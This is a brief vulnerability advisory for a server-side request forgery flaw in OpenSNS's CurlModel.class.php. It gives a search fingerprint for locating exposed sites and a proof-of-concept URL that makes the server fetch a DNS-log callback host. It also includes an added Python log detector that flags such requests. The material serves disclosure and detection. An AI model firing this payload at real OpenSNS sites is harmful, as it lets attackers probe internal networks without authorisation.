OpenSNS CurlModel.class.php SSRF vulnerability
Vulnerability Description
The curl method in the OpenSNS CurlModel.class.php file contains an SSRF vulnerability. An attacker can use it to probe intranet information.
Vulnerability Impact
OpenSNS
Network surveying and mapping
icon_hash="1167011145"
Vulnerability reproduction
The login page is as follows
The vulnerable file is Application/Admin/Model/CurlModel.class.php
Construct POC
/?s=weibo/share/shareBox&query=app=Admin%26model=Curl%26method=curl%26id=https://92aq2z.dnslog.cn
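To find requests of the shape shown in the PoC above in web server access logs, the following added example (not part of the original post or of OpenSNS) decodes the nested query parameter and reports the URL the server was asked to fetch. The log lines are constructed, and the combined log format and the function names detect and classify_target are assumptions.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (combined log format assumed).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /?s=weibo/share/shareBox&query=app=Admin%26model=Curl%26method=curl%26id=https://callback.example.test HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "GET /?s=weibo/share/shareBox&query=app=Admin%26model=Curl%26method=curl%26id=http://192.168.1.10:8080/ HTTP/1.1" 200 87',
    '198.51.100.4 - - [01/Jan/2024:10:01:00 +0000] "GET /?s=weibo/share/shareBox&query=app=Weibo%26model=Weibo%26method=getWeiboDetail%26id=12 HTTP/1.1" 200 2048',
    '198.51.100.9 - - [01/Jan/2024:10:02:00 +0000] "GET /index.php?s=/home/index HTTP/1.1" 200 4096',
]

REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def classify_target(url):
    """Label the fetch target: literal private/loopback address or other host."""
    host = urlsplit(url).hostname or ""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return "internal" if host == "localhost" else "external"
    internal = ip.is_private or ip.is_loopback or ip.is_link_local
    return "internal" if internal else "external"


def detect(line):
    """Return details if the line routes shareBox to the Admin Curl model."""
    match = REQUEST.search(line)
    if not match:
        return None
    outer = parse_qs(urlsplit(match.group(1)).query)
    if outer.get("s", [""])[0].strip("/").lower() != "weibo/share/sharebox":
        return None
    # parse_qs has already decoded %26 to &, so "query" is a nested query string.
    inner = parse_qs(outer.get("query", [""])[0])
    field = lambda key: inner.get(key, [""])[0]
    wanted = ("admin", "curl", "curl")
    if tuple(field(k).lower() for k in ("app", "model", "method")) != wanted:
        return None
    target = field("id")
    return {"client": line.split()[0], "target": target,
            "scope": classify_target(target)}


if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        hit = detect(entry)
        if hit:
            print(hit)
```

This only inspects the request line, so parameters sent in a POST body are not covered.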
This post is licensed under CC BY 4.0 by the author.